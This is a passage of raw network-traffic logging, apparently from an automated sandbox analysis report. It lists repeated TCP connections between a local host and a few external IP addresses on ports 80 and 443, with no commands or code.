                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 198.46.178.134:80 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 198.46.178.134:80 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 198.46.178.134:80 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 198.46.178.134:80 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 198.46.178.134:80 -> 192.168.2.22:49163
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                      Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                      Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.46.178.134:80
                      Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:80 -> 192.168.2.22:49164
                      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:80
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 216.58.206.46:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 216.58.206.46:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.186.97:443
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 142.250.186.97:443 -> 192.168.2.22:49167
